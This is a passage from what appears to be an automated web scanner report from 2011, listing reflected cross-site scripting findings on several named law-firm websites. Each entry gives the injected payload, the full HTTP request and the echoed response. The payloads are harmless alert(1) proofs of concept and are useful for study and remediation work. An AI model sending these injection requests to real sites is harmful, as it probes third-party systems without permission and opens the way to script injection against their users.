Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.hbsr.com/
Cookie: __utma=94973637.168735978.1305202890.1305202890.1305202890.1; __utmb=94973637.1.10.1305202890; __utmc=94973637; __utmz=94973637.1305202890.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Hamilton%20Brook%20Smith%20%26%20Reynolds

Response

HTTP/1.1 404 Not Found
Date: Thu, 12 May 2011 12:26:44 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 8851

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<a href="http://www.hbsr.com/practices_technologies/index66193"><script>alert(1)</script>5ba64a12336-print">
...[SNIP]...

4.159. http://www.hbsr.com/practices_technologies/index [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hbsr.com
Path:   /practices_technologies/index

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 23205"><script>alert(1)</script>ebacbb96fc1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /practices_technologies/index?23205"><script>alert(1)</script>ebacbb96fc1=1 HTTP/1.1
Host: www.hbsr.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.hbsr.com/
Cookie: __utma=94973637.168735978.1305202890.1305202890.1305202890.1; __utmb=94973637.1.10.1305202890; __utmc=94973637; __utmz=94973637.1305202890.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Hamilton%20Brook%20Smith%20%26%20Reynolds

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 12:26:43 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 9933

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<a href="http://www.hbsr.com/practices_technologies/index?23205"><script>alert(1)</script>ebacbb96fc1=1&amp;printable=yes">
...[SNIP]...

4.160. http://www.hbsr.com/practices_technologies/software [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hbsr.com
Path:   /practices_technologies/software

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 940d0"><script>alert(1)</script>8c7d3e9285e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /practices_technologies940d0"><script>alert(1)</script>8c7d3e9285e/software HTTP/1.1
Host: www.hbsr.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.hbsr.com/practices_technologies/telecommunications
Cookie: __utma=94973637.168735978.1305202890.1305202890.1305202890.1; __utmb=94973637.3.10.1305202890; __utmc=94973637; __utmz=94973637.1305202890.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Hamilton%20Brook%20Smith%20%26%20Reynolds

Response

HTTP/1.1 404 Not Found
Date: Thu, 12 May 2011 12:27:50 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 8857

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<a href="http://www.hbsr.com/practices_technologies940d0"><script>alert(1)</script>8c7d3e9285e/software-print">
...[SNIP]...

4.161. http://www.hbsr.com/practices_technologies/software [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hbsr.com
Path:   /practices_technologies/software

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 931a5"><script>alert(1)</script>bea7ff528b1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /practices_technologies/software931a5"><script>alert(1)</script>bea7ff528b1 HTTP/1.1
Host: www.hbsr.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.hbsr.com/practices_technologies/telecommunications
Cookie: __utma=94973637.168735978.1305202890.1305202890.1305202890.1; __utmb=94973637.3.10.1305202890; __utmc=94973637; __utmz=94973637.1305202890.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Hamilton%20Brook%20Smith%20%26%20Reynolds

Response

HTTP/1.1 404 Not Found
Date: Thu, 12 May 2011 12:27:50 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 8857

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<a href="http://www.hbsr.com/practices_technologies/software931a5"><script>alert(1)</script>bea7ff528b1-print">
...[SNIP]...

4.162. http://www.hbsr.com/practices_technologies/software [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hbsr.com
Path:   /practices_technologies/software

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6cf66"><script>alert(1)</script>9fc1b0ef96e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /practices_technologies/software?6cf66"><script>alert(1)</script>9fc1b0ef96e=1 HTTP/1.1
Host: www.hbsr.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.hbsr.com/practices_technologies/telecommunications
Cookie: __utma=94973637.168735978.1305202890.1305202890.1305202890.1; __utmb=94973637.3.10.1305202890; __utmc=94973637; __utmz=94973637.1305202890.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Hamilton%20Brook%20Smith%20%26%20Reynolds

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 12:27:49 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 18763

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<a href="http://www.hbsr.com/practices_technologies/software?6cf66"><script>alert(1)</script>9fc1b0ef96e=1&amp;printable=yes">
...[SNIP]...

4.163. http://www.hbsr.com/practices_technologies/telecommunications [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hbsr.com
Path:   /practices_technologies/telecommunications

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7c3c6"><script>alert(1)</script>c469b26ecf4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /practices_technologies7c3c6"><script>alert(1)</script>c469b26ecf4/telecommunications HTTP/1.1
Host: www.hbsr.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.hbsr.com/practices_technologies/index
Cookie: __utma=94973637.168735978.1305202890.1305202890.1305202890.1; __utmb=94973637.2.10.1305202890; __utmc=94973637; __utmz=94973637.1305202890.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Hamilton%20Brook%20Smith%20%26%20Reynolds

Response

HTTP/1.1 404 Not Found
Date: Thu, 12 May 2011 12:26:51 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 8877

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<a href="http://www.hbsr.com/practices_technologies7c3c6"><script>alert(1)</script>c469b26ecf4/telecommunications-print">
...[SNIP]...

4.164. http://www.hbsr.com/practices_technologies/telecommunications [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hbsr.com
Path:   /practices_technologies/telecommunications

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d6292"><script>alert(1)</script>f9653883093 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /practices_technologies/telecommunicationsd6292"><script>alert(1)</script>f9653883093 HTTP/1.1
Host: www.hbsr.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.hbsr.com/practices_technologies/index
Cookie: __utma=94973637.168735978.1305202890.1305202890.1305202890.1; __utmb=94973637.2.10.1305202890; __utmc=94973637; __utmz=94973637.1305202890.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Hamilton%20Brook%20Smith%20%26%20Reynolds

Response

HTTP/1.1 404 Not Found
Date: Thu, 12 May 2011 12:26:51 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 8877

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<a href="http://www.hbsr.com/practices_technologies/telecommunicationsd6292"><script>alert(1)</script>f9653883093-print">
...[SNIP]...

4.165. http://www.hbsr.com/practices_technologies/telecommunications [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hbsr.com
Path:   /practices_technologies/telecommunications

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4a22e"><script>alert(1)</script>2ad03aa0f89 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /practices_technologies/telecommunications?4a22e"><script>alert(1)</script>2ad03aa0f89=1 HTTP/1.1
Host: www.hbsr.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.hbsr.com/practices_technologies/index
Cookie: __utma=94973637.168735978.1305202890.1305202890.1305202890.1; __utmb=94973637.2.10.1305202890; __utmc=94973637; __utmz=94973637.1305202890.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Hamilton%20Brook%20Smith%20%26%20Reynolds

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 12:26:50 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 17308

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<a href="http://www.hbsr.com/practices_technologies/telecommunications?4a22e"><script>alert(1)</script>2ad03aa0f89=1&amp;printable=yes">
...[SNIP]...

4.166. http://www.pillsburylaw.com/connect_forgotpassword.cfm [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.pillsburylaw.com
Path:   /connect_forgotpassword.cfm

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cbbe9"><a>9ff6b508074 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /connect_forgotpassword.cfm?p=60&cbbe9"><a>9ff6b508074=1 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/index.cfm?pageID=60
Cookie: CFID=11812912; CFTOKEN=34459793; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utma=249287046.1504885052.1305202905.1305202905.1305202905.1; __utmb=249287046.5.10.1305202905; __utmc=249287046; __utmz=249287046.1305202905.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2008%3A31%3A41; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=11812912;path=/
Set-Cookie: CFTOKEN=34459793;path=/
Date: Thu, 12 May 2011 12:32:27 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><script type="text/javas
...[SNIP]...
<input type="hidden" class="formelement2" NAME="referringPage" VALUE="http://www.pillsburylaw.com/index.cfm?p=60&cbbe9"><a>9ff6b508074=1">
...[SNIP]...

4.167. http://www.pillsburylaw.com/connect_forgotpassword.cfm [p parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pillsburylaw.com
Path:   /connect_forgotpassword.cfm

Issue detail

The value of the p request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 24eb9"><img%20src%3da%20onerror%3dalert(1)>4643c09008e was submitted in the p parameter. This input was echoed as 24eb9"><img src=a onerror=alert(1)>4643c09008e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /connect_forgotpassword.cfm?p=6024eb9"><img%20src%3da%20onerror%3dalert(1)>4643c09008e HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/index.cfm?pageID=60
Cookie: CFID=11812912; CFTOKEN=34459793; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utma=249287046.1504885052.1305202905.1305202905.1305202905.1; __utmb=249287046.5.10.1305202905; __utmc=249287046; __utmz=249287046.1305202905.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2008%3A31%3A41; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=11812912;path=/
Set-Cookie: CFTOKEN=34459793;path=/
Date: Thu, 12 May 2011 12:32:18 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><script type="text/javas
...[SNIP]...
<input type="hidden" name="p" value="6024eb9"><img src=a onerror=alert(1)>4643c09008e" />
...[SNIP]...

4.168. http://www.pillsburylaw.com/index.cfm [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.pillsburylaw.com
Path:   /index.cfm

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 16e81"><a>f671e58fc63 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /index.cfm?pageID=60&16e81"><a>f671e58fc63=1 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/index.cfm?pageid=12&itemid=1908
Cookie: CFID=11812912; CFTOKEN=34459793; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utma=249287046.1504885052.1305202905.1305202905.1305202905.1; __utmb=249287046.2.10.1305202905; __utmc=249287046; __utmz=249287046.1305202905.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2008%3A21%3A46; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=11812912;path=/
Set-Cookie: CFTOKEN=34459793;path=/
Date: Thu, 12 May 2011 12:32:17 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<META HTTP-EQUIV="Co
...[SNIP]...
<a href="printfriendly.cfm?pageID=60&16e81"><a>f671e58fc63=1&printF=1" target="_blank">
...[SNIP]...

4.169. http://www.stroock.com/sitecontent.cfm [contentID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.stroock.com
Path:   /sitecontent.cfm

Issue detail

The value of the contentID request parameter is copied into the HTML document as plain text between tags. The payload bbde0<img%20src%3da%20onerror%3dalert(1)>1ea5943f0a8 was submitted in the contentID parameter. This input was echoed as bbde0<img src=a onerror=alert(1)>1ea5943f0a8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sitecontent.cfm?contentID=64bbde0<img%20src%3da%20onerror%3dalert(1)>1ea5943f0a8 HTTP/1.1
Host: www.stroock.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.stroock.com/
Cookie: CFID=6906919; CFTOKEN=98918862; __utma=266256077.1614775241.1305202918.1305202918.1305202918.1; __utmb=266256077.1.10.1305202918; __utmc=266256077; __utmz=266256077.1305202918.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Stroock%20%26%20Stroock%20%26%20Lavan

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Thu, 12 May 2011 12:26:26 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
server-error: true
Content-Type: text/html; charset=UTF-8


<!-- " ---></TD></TD></TD></TH></TH></TH></TR></TR></TR></TABLE></TABLE></TABLE></A></ABBREV></ACRONYM></ADDRESS></APPLET></AU></B></BANNER></BIG></BLINK></BLOCKQUOTE></BQ></CAPTION></CENTER></CIT
...[SNIP]...
<h1 id="textSection1" style="COLOR: black; FONT: 13pt/15pt verdana">
Invalid data 64bbde0<img src=a onerror=alert(1)>1ea5943f0a8 for CFSQLTYPE CF_SQL_INTEGER.
</h1>
...[SNIP]...

4.170. http://www.wolfgreenfield.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wolfgreenfield.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cb09b"><script>alert(1)</script>c37b8140c4a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.icocb09b"><script>alert(1)</script>c37b8140c4a HTTP/1.1
Host: www.wolfgreenfield.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=163387450.1305201715.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=163387450.397051366.1305201715.1305201715.1305201715.1; __utmc=163387450; __utmb=163387450.2.10.1305201715

Response

HTTP/1.1 404 Not Found
Date: Thu, 12 May 2011 12:02:12 GMT
Server: Apache/2.0.64 (Red Hat)
X-Powered-By: PHP/5.2.6
Connection: close
Content-Type: text/html
Content-Length: 10952

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<a href="javascript:email_window('http://www.wolfgreenfield.com/favicon.icocb09b"><script>alert(1)</script>c37b8140c4a');" title="Email Page">
...[SNIP]...

4.171. http://www.wolfgreenfield.com/industries_technologies/index [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wolfgreenfield.com
Path:   /industries_technologies/index

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3e53a"><script>alert(1)</script>4a16753e0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /industries_technologies3e53a"><script>alert(1)</script>4a16753e0/index HTTP/1.1
Host: www.wolfgreenfield.com
Proxy-Connection: keep-alive
Referer: http://wolfgreenfield.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=163387450.1305201715.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=163387450.397051366.1305201715.1305201715.1305201715.1; __utmc=163387450; __utmb=163387450.1.10.1305201715

Response

HTTP/1.1 404 Not Found
Date: Thu, 12 May 2011 12:02:17 GMT
Server: Apache/2.0.64 (Red Hat)
X-Powered-By: PHP/5.2.6
Connection: close
Content-Type: text/html
Content-Length: 10984

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<a href="javascript:email_window('http://www.wolfgreenfield.com/industries_technologies3e53a"><script>alert(1)</script>4a16753e0/index');" title="Email Page">
...[SNIP]...

4.172. http://www.wolfgreenfield.com/industries_technologies/index [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wolfgreenfield.com
Path:   /industries_technologies/index

Issue detail

